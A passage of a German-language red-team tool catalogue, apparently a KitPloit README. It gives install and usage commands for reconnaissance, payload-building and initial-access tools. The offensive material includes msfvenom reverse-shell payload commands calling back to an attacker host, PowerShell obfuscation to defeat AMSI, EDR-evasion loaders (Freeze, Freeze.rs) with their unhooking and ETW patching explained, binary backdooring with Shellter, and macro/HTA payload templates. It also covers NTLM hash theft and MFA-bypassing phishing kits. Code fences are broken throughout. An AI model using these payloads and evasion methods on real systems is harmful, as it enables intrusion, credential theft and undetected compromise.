  • SPF-Eintrag spezifiziert nie ~all oder -all
  • DMARC-Richtlinie ist auf p=none gesetzt oder nicht vorhanden

Installation:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**Verwendung:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump ist ein Tool, um schnell AWS S3 Buckets zu durchsuchen und nach interessanten Dateien zu suchen. Es ähnelt einem Subdomain-Bruteforcer, ist aber speziell für S3-Buckets entwickelt und bietet zusätzliche Funktionen, mit denen Sie nach Dateien greppen und interessante Dateien herunterladen können.

Installation:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**Verwendung:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

Nützliches Tool zum Auffinden von Informationen aus GitHub mit Regex, mit der Möglichkeit, nach bestimmten GitHub-Benutzern und/oder Projekten zu suchen.

Installation:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**Verwendung:**```
./githarvester.py

🔙truffleHog

TruffleHog ist ein Tool, das Git-Repositories scannt und nach Hochenergie-Strings und -Mustern sucht, die auf das Vorhandensein von Geheimnissen wie Passwörtern und API-Schlüsseln hinweisen können. Mit TruffleHog können Sie schnell und einfach sensible Informationen finden, die versehentlich committet und in ein Repository gepusht wurden.

Installation (Binaries): Link

Installation (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**Verwendung:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap ist ein Tool zur Asset-Erkennung und -Identifikation. Es kann schnell Protokolle und Fingerabdruckinformationen wie Web/TCP/UDP identifizieren, Asset-Typen lokalisieren und eignet sich für interne und externe Netzwerke.

Dismap verfügt über eine vollständige Fingerabdruck-Regelbasis, die derzeit tcp/udp/tls-Protokoll-Fingerabdrücke und über 4500 Web-Fingerabdruck-Regeln umfasst. Es kann Favicon, Body, Header usw. identifizieren.

Installation:

Dismap ist eine Binärdatei für Linux, MacOS und Windows. Gehen Sie zu Release, um die entsprechende Version herunterzuladen und auszuführen:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**Verwendung:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Bild verwendet von https://github.com/zhzyker/dismap

🔙enum4linux

Ein Tool zum Auflisten von Informationen aus Windows- und Samba-Systemen.

Es kann verwendet werden, um eine breite Palette von Informationen zu sammeln, darunter:

  • Domänen- und Domänencontroller-Informationen
  • Lokale Benutzer- und Gruppeninformationen
  • Freigaben und Freigabeberechtigungen
  • Sicherheitsrichtlinien
  • Active Directory-Informationen

Installation: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**Installieren: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Verwendung:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
Full usage information can be found in this [blog](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://assets.kitploit.com/production/public/readmes/495/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

_Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/_

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

Dangerously fast dns/network/port scanner, created by [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), written in Rust.

You will need a subdomains file. _E.g. [Subdomain wordlist by Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_.

**Installation:**

Download the latest release from [here](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Verwendung:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

_Bild verwendet von https://github.com/Esc4iCEscEsc/skanuvaty_

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor ist ein Intelligence-Tool, dessen Ziel es ist, OSINT-Aufgaben und mehr zu erledigen, jedoch ohne API-Schlüssel.

**Hauptfunktionen:**

- Informationen über IP-Adressen, ASN und Organisationen suchen.
- Wrapper zum effizienteren Ausführen von rustscan, masscan und nmap auf IP/CIDR.
- Finden weiterer verwandter Domains des Ziels durch Anwendung verschiedener Techniken (Zertifikat, Whois, Google Analytics, etc.).
- Zusammenfassung über eine IP-Adresse (ermöglicht durch [@thebl4ckturtle](https://github.com/theblackturtle))

**Installation:**```bash
go install github.com/j3ssie/metabigor@latest

Verwendung:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

_Bild verwendet von https://github.com/j3ssie/metabigor_

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob ist ein Tool, das dabei hilft, potenziell sensible Dateien zu finden, die in öffentliche Repositories auf Github gepusht wurden.

Gitrob klont Repositories eines Benutzers oder einer Organisation bis zu einer konfigurierbaren Tiefe und durchläuft die Commit-Historie, um Dateien zu markieren, die Signaturen für potenziell sensible Dateien entsprechen.

Die Ergebnisse werden über eine Weboberfläche dargestellt, um einfaches Durchsuchen und Analysieren zu ermöglichen.

**Hinweis:** _Gitrob benötigt einen Github-Zugriffstoken, um mit der Github-API zu interagieren. [Erstellen Sie ein persönliches Zugriffstoken](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) und speichern Sie es in einer Umgebungsvariable in Ihrer .bashrc oder einer ähnlichen Shell-Konfigurationsdatei:_```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Installieren: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**Installation: (Binary)**

Eine [vorkompilierte Version](https://github.com/michenriksen/gitrob/releases) ist für jedes Release verfügbar.

**Verwendung:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

Bild verwendet von https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness ist ein Dienstprogramm zum Erstellen von Screenshots von Websites, geschrieben in Golang, das Chrome Headless verwendet, um über die Befehlszeile Screenshots von Webschnittstellen zu erstellen, mit einem praktischen Berichtsanzeiger zur Verarbeitung der Ergebnisse. Sowohl Linux als auch macOS werden unterstützt, wobei die Windows-Unterstützung größtenteils funktioniert.

Installation: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
Vollständige Installationsinformationen finden Sie [hier](https://github.com/sensepost/gowitness/wiki/Installation).

**Verwendung:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

Vollständige Nutzungsinformationen finden Sie hier.

image

Bild verwendet von https://github.com/sensepost/gowitness

Ressourcenentwicklung

🔙Chimera

Chimera ist ein PowerShell-Obfuskierungsskript, das entwickelt wurde, um AMSI und Antivirenlösungen zu umgehen. Es verarbeitet bösartige PS1-Dateien, die bekanntermaßen AV auslösen, und verwendet Zeichenersetzung und Variablenverkettung, um gängige Erkennungssignaturen zu umgehen.

Installation:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**Verwendung:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

Bild

🔙msfvenom

Msfvenom ermöglicht die Erstellung von Payloads für verschiedene Betriebssysteme in einer breiten Palette von Formaten. Es unterstützt auch die Verschleierung von Payloads zur Umgehung von Antivirenprogrammen.

Listener einrichten```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### Msfvenom-Befehle

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙Shellter

Shellter ist ein dynamisches Shellcode-Injektionswerkzeug und der erste wirklich dynamische PE-Infektor, der je entwickelt wurde.

Es kann verwendet werden, um Shellcode in native Windows-Anwendungen zu injizieren (derzeit nur 32-Bit-Anwendungen).

Shellter nutzt die ursprüngliche Struktur der PE-Datei aus und wendet keine Modifikationen an, wie das Ändern von Speicherzugriffsberechtigungen in Abschnitten (es sei denn, der Benutzer möchte dies), das Hinzufügen eines zusätzlichen Abschnitts mit RWE-Zugriff oder alles, was bei einem AV-Scan verdächtig wirken würde.

Die vollständigen README-Informationen finden Sie hier.

Installation: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**Installation: (Windows)**

Besuchen Sie die [Download-Seite](https://www.shellterproject.com/download/) und installieren Sie.

**Verwendung:**

Wählen Sie einfach eine legitime Binärdatei aus, um einen Hintertür einzubauen, und führen Sie Shellter aus.

Einige nützliche Tipps finden Sie [hier](https://www.shellterproject.com/tipstricks/).

Viele Community-Demos finden Sie [hier](https://www.shellterproject.com/shellter-community-demos/).

![image](https://assets.kitploit.com/production/public/readmes/495/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

_Bild verwendet von https://www.kali.org/tools/shellter/images/shellter.png_

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze ist ein Tool zur Erstellung von Payloads, das verwendet wird, um EDR-Sicherheitskontrollen zu umgehen und Shellcode auf unauffällige Weise auszuführen.

Freeze nutzt mehrere Techniken, um nicht nur Userland-EDR-Hooks zu entfernen, sondern auch Shellcode so auszuführen, dass andere Endpunkt-Überwachungskontrollen umgangen werden.

**Installation:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

Verwendung:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

_Bild verwendet von https://www.blackhatethicalhacking.com/tools/freeze/_

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

Dieses Skript erstellt ein Microsoft Word-Dokument mit einem entfernten Bild, was die Erfassung von NTML-Hashes von einem entfernten Opfer-Endpunkt ermöglicht.

Microsoft Word bietet die Möglichkeit, Bilder von entfernten Orten einzubinden, einschließlich eines entfernten Bildes, das auf einem von Angreifern kontrollierten SMB-Server gehostet wird. Dies gibt Ihnen die Gelegenheit, NTLM-Hashes zu lauschen und zu erfassen, die gesendet werden, wenn ein authentifiziertes Opfer das Word-Dokument öffnet und das Bild rendert.

**Installation:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

Verwendung:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

_Bild verwendet von https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/_

---

### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)

Wenn Sie mehr über die in diesem Framework verwendeten Techniken erfahren möchten, werfen Sie einen Blick auf den SourceZero Blog und das ursprüngliche Tool.

**Beschreibung:**

Freeze.rs ist ein Tool zur Erstellung von Payloads, das verwendet wird, um EDR-Sicherheitskontrollen zu umgehen und Shellcode auf eine verdeckte Weise auszuführen. Freeze.rs nutzt mehrere Techniken, um nicht nur Userland-EDR-Hooks zu entfernen, sondern auch Shellcode so auszuführen, dass andere Endpunkt-Überwachungskontrollen umgangen werden.

**Erstellen eines angehaltenen Prozesses:**

Wenn ein Prozess erstellt wird, ist Ntdll.dll die erste DLL, die geladen wird; dies geschieht, bevor EDR-DLLs geladen werden. Das bedeutet, dass es eine kleine Verzögerung gibt, bevor eine EDR geladen werden kann und beginnt, Hooks zu setzen und den Assemblercode von System-DLLs zu modifizieren. Wenn man sich Windows-Syscalls in Ntdll.dll ansieht, sieht man, dass noch nichts gehooked ist. Wenn wir einen Prozess im angehaltenen Zustand erstellen (einen, der in der Zeit eingefroren ist), sehen wir, dass außer Ntdll.dll keine anderen DLLs geladen sind. Man sieht auch, dass keine EDR-DLLs geladen sind, was bedeutet, dass die Syscalls in Ntdll.dll unverändert sind.

![image](https://assets.kitploit.com/production/public/readmes/495/bd6869a0876e06b636a0ab2814e3a2353a4dd7954834e3d79c3b2b44a03c27a4.png)

**Address Space Layout Randomization**

Um diesen sauberen angehaltenen Prozess zu verwenden, um Hooks aus dem Freeze.rs-Loader zu entfernen, benötigen wir eine Möglichkeit, programmatisch den Speicher des sauberen angehaltenen Prozesses zu finden und zu lesen. Hier kommt die Address Space Layout Randomization (ASLR) ins Spiel. ASLR ist ein Sicherheitsmechanismus zur Verhinderung von Schwachstellen, die auf Stack-Speicherkorruption basieren. ASLR randomisiert den Adressraum innerhalb eines Prozesses, um sicherzustellen, dass alle speicherabgebildeten Objekte, der Stack, der Heap und das ausführbare Programm selbst einzigartig sind. Nun wird es interessant, denn obwohl ASLR funktioniert, funktioniert es nicht für positionsunabhängigen Code wie DLLs. Was bei DLLs (insbesondere bekannten System-DLLs) passiert, ist, dass der Adressraum einmal beim Booten randomisiert wird. Das bedeutet, dass wir keine Informationen eines entfernten Prozesses aufzählen müssen, um die Basisadresse seiner ntdll.dll zu finden, da sie in allen Prozessen gleich ist, einschließlich des von uns kontrollierten. Da die Adresse jeder DLL pro Boot an derselben Stelle liegt, können wir diese Informationen aus unserem eigenen Prozess abrufen und müssen nie den angehaltenen Prozess aufzählen, um die Adresse zu finden.

![image](https://assets.kitploit.com/production/public/readmes/495/2e982f594ca0dc518cb32bf3ff1e2803416c699a0fe3f067b1d521276352f53d.png)

Mit diesen Informationen können wir die API ReadProcessMemory verwenden, um den Speicher eines Prozesses zu lesen. Dieser API-Aufruf wird häufig mit dem Lesen von LSASS im Rahmen von angriffsbasierten Angriffen in Verbindung gebracht; jedoch ist er an sich nicht bösartig, insbesondere wenn wir nur einen beliebigen Speicherbereich lesen. Das einzige Mal, dass ReadProcessMemory als verdächtig eingestuft wird, ist, wenn man etwas liest, das man nicht sollte (wie den Inhalt von LSASS). EDR-Produkte sollten niemals die Tatsache kennzeichnen, dass ReadProcessMemory aufgerufen wurde, da es legitime betriebliche Verwendungen für diese Funktion gibt und dies zu vielen Fehlalarmen führen würde.

Wir können noch einen Schritt weiter gehen, indem wir nur einen Abschnitt von Ntdll.dll lesen, in dem alle Syscalls gespeichert sind – den .text-Abschnitt, anstatt die gesamte DLL zu lesen.

Durch die Kombination dieser Elemente können wir programmatisch eine Kopie des .text-Abschnitts von Ntdll.dll erhalten, um unseren vorhandenen gehookten .text-Abschnitt vor der Ausführung von Shellcode zu überschreiben.

**ETW Patching**

ETW nutzt eingebaute Syscalls, um diese Telemetrie zu generieren. Da ETW auch eine native Funktion von Windows ist, müssen Sicherheitsprodukte die ETW-Syscalls nicht 'hoken', um auf die Informationen zuzugreifen. Daher patcht Freeze.rs, um ETW zu verhindern, zahlreiche ETW-Syscalls, leert die Register und gibt den Ausführungsfluss an die nächste Anweisung zurück. Das Patchen von ETW ist jetzt standardmäßig in allen Loadern.

**Shellcode**

![image](https://assets.kitploit.com/production/public/readmes/495/896ef4933a6d5762f9b019a2b557d49af151890f979736ca6c710c856b3d8b94.png)

Mit der Rust NTAPI-Crate kann man sehen, dass all diese Aufrufe nicht unter ntdll.dll auftauchen, jedoch existieren sie weiterhin innerhalb des Prozesses.

![image](https://assets.kitploit.com/production/public/readmes/495/8fb4ee66b377c99c51144b36ef80b7f8e795c0197296959ed89161f57838a4c0.png)

Als Ergebnis:

![image](https://assets.kitploit.com/production/public/readmes/495/a8a1bbb194d7e417c9961540376fcb92dc4092b4cbe524cc5c58ce820cb24568.png)

![image](https://assets.kitploit.com/production/public/readmes/495/8a5ddf3aebb2e87f5226d6cde7414adde2d0f4485ddee6aa82170484d8967bd4.png)

**Warum Rust?**

Dies begann als ein lustiges Projekt, um Rust zu lernen, und ist zu einem eigenen Framework herangewachsen.

**Mitwirken**

Freeze.rs wurde in Rust entwickelt.

**Installation**

Wenn Rust und Rustup nicht installiert sind, bitte installieren Sie sie. Wenn Sie es von OSX oder Linux aus kompilieren, stellen Sie sicher, dass das Target 'x86_64-pc-windows-gnu' hinzugefügt wurde. Führen Sie dazu den folgenden Befehl aus:

Sobald dies erledigt ist, können Sie Freeze.rs kompilieren, die folgenden Befehle ausführen oder die kompilierte Binärdatei verwenden:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release

Von dort aus befindet sich die kompilierte Version in target/release (beachten Sie, wenn Sie --release nicht setzen, wird die Datei in target/debug/ sein)```bash ___________ _ /_ ____ ____ ________ ____ _______ ______ | ) _ __ _/ __ _/ __ \_ // __ \ _ __ / / | \ | | /\ /\ / / /\ / | | /_
_
/ |
| _
>_
>
___ \___ > /\ |__| /____ > / / / / / / / (@Tyl0us) Soon they will learn that revenge is a dish... best served COLD & Rusty...

USAGE: Freeze-rs [FLAGS] [OPTIONS]

FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information

OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.

root@kitploit:~
**Binärdatei vs. DLL**
Freeze.rs kann entweder eine .exe- oder eine .dll-Datei erzeugen. Um dies festzulegen, stellen Sie sicher, dass die Befehlszeilenoption -O entweder auf .exe für Binärdateien oder .dll für DLLs endet. Andere Dateitypen werden derzeit nicht unterstützt. Im Falle von DLL-Dateien kann Freeze.rs auch zusätzliche Exportfunktionen hinzufügen. Verwenden Sie dazu -export mit einem bestimmten Export-Funktionsnamen.

**Verschlüsselung**
Die Verschlüsselung von Shellcode ist eine wichtige Technik, um ihn vor der Erkennung und Analyse durch EDRs und andere Sicherheitsprodukte zu schützen. Freeze.rs bietet mehrere Methoden zur Verschlüsselung von Shellcode, darunter AES, ELZMA und RC4.

**AES**
AES (Advanced Encryption Standard) ist ein symmetrischer Verschlüsselungsalgorithmus, der weit verbreitet zur Verschlüsselung von Daten eingesetzt wird. Freeze.rs verwendet AES-256-Bit, um den Shellcode zu verschlüsseln. Der Vorteil der Verwendung von AES zur Shellcode-Verschlüsselung liegt in der starken Verschlüsselung und der breiten Unterstützung durch kryptografische Bibliotheken. Die Verwendung einer festen Blockgröße kann jedoch anfällig für bestimmte Angriffe wie den Padding-Oracle-Angriff machen.

**ELZMA**
ELZMA ist ein Kompressions- und Verschlüsselungsalgorithmus, der häufig in Malware zur Verschleierung des Codes eingesetzt wird. Um Shellcode mit ELZMA zu verschlüsseln, wird der Shellcode zunächst mit dem ELZMA-Algorithmus komprimiert. Die komprimierten Daten werden dann mit einem zufälligen Schlüssel verschlüsselt. Die verschlüsselten Daten und der Schlüssel werden anschließend in den Exploit-Code eingebettet. Der Vorteil der Verwendung von ELZMA zur Shellcode-Verschlüsselung besteht darin, dass sowohl Kompression als auch Verschlüsselung in einem einzigen Algorithmus vereint sind. Dies kann dazu beitragen, die Größe des Exploit-Codes zu reduzieren und die Erkennung zu erschweren.

**RC4**
RC4 ist ein symmetrischer Verschlüsselungsalgorithmus, der häufig in Malware zur Verschlüsselung von Shellcode verwendet wird. Es handelt sich um eine Stromchiffre, die Schlüssel variabler Länge verwendet und für ihre Einfachheit und Geschwindigkeit bekannt ist.

**Konsole**
Freeze.rs verwendet eine Technik, bei der zunächst der Prozess erstellt und dann in den Hintergrund verschoben wird. Dies bewirkt zweierlei: Erstens hilft es, den Prozess verborgen zu halten, und zweitens wird die Erkennung durch EDR-Produkte vermieden. Einen Prozess sofort im Hintergrund zu starten, kann sehr verdächtig wirken und ein Indikator für Bösartigkeit sein. Freeze.rs ruft dazu nach der Erstellung des Prozesses und dem Laden der EDR-Hooks die Windows-Funktionen ‘GetConsoleWindow’ und ‘ShowWindow’ auf und ändert dann die Fensterattribute auf „versteckt“.

Wird die Befehlszeilenoption -console gewählt, blendet Freeze.rs den Prozess nicht in den Hintergrund. Stattdessen fügt Freeze.rs mehrere Debug-Meldungen hinzu, die anzeigen, was der Loader gerade tut.

---

### [🔙](#tool-list)WSH

**Payload erstellen:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Ausführen:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**Payload erstellen:**```html
<html>
  <body>
    <script>
      var c = "cmd.exe";
      new ActiveXObject("WScript.Shell").Run(c);
    </script>
  </body>
</html>

Ausführen: Datei ausführen

🔙VBA

Payload erstellen:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**Ausführen:** Setze Funktion auf Auto_Open() in makroaktiviertem Dokument

# Erstzugriff

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

Der Bash Bunny ist ein physisches USB-Angriffswerkzeug und ein multifunktionales Payload-Auslieferungssystem. Es ist dafür ausgelegt, in einen USB-Anschluss eines Computers gesteckt zu werden, und kann programmiert werden, um verschiedene Funktionen auszuführen, darunter das Manipulieren und Exfiltrieren von Daten, das Installieren von Malware und das Umgehen von Sicherheitsmaßnahmen.

[hackinglab: Bash Bunny – Leitfaden](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Hak5 Dokumentation](https://docs.hak5.org/bash-bunny/)

[Payload-Repository](https://github.com/hak5/bashbunny-payloads)

[Produktseite](https://hak5.org/products/bash-bunny)

![image](https://assets.kitploit.com/production/public/readmes/495/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish ist ein leistungsstarkes Open-Source-Phishing-Framework, das es einfach macht, die Gefährdung einer Organisation durch Phishing zu testen. (evilginx2) Ein eigenständiges Man-in-the-Middle-Angriffsframework, das zum Phishing von Anmeldeinformationen zusammen mit Sitzungscookies verwendet wird, wodurch die Zwei-Faktor-Authentifizierung umgangen werden kann.

**Installation:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

Verwendung:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

Dieses Framework eignet sich hervorragend zum Erstellen von Kampagnen für den Erstzugriff. „SET verfügt über eine Reihe von benutzerdefinierten Angriffsvektoren, mit denen Sie schnell einen glaubwürdigen Angriff durchführen können.“

**Installation:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Verwendung:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

Nützliches Tool für Brute-Force-Angriffe auf Logins. Kann eine Reihe von Diensten wie SSH, FTP, TELNET, HTTP usw. angreifen.

**Installation:**```bash
sudo apt install hydra

Verwendung:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish ist ein fortschrittliches Phishing-Tool, das eine Technik verwendet, die den OAuth Device Code Authentication Flow und QR-Codes kombiniert (siehe [PhishInSuits](https://github.com/secureworks/PhishInSuits) um mehr über den OAuth Device Code Flow für Phishing-Angriffe zu erfahren).

Angriffsschritte:

- Senden eines schädlichen QR-Codes an das Opfer
- Opfer scannt QR-Code mit mobilem Gerät
- Opfer wird zu einem vom Angreifer kontrollierten Server weitergeleitet (Auslösen des OAuth Device Code Authentifizierungsfluss-Prozesses)
- Opfer erhält per E-Mail einen MFA-Code (Auslösen des 15-minütigen Timers des OAuth Device Code Flows)
- Angreifer fragt nach Authentifizierung ab
- Opfer gibt den Code auf der legitimen Microsoft-Website ein
- Angreifer speichert Authentifizierungstoken

**Install:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Hinweis: Bevor Sie eines der Module verwenden, aktualisieren Sie die erforderlichen Informationen in der settings.config-Datei, die mit Required gekennzeichnet sind.

Verwendung (E-Mail-Modul):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**Verwendung (Server-Modul):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

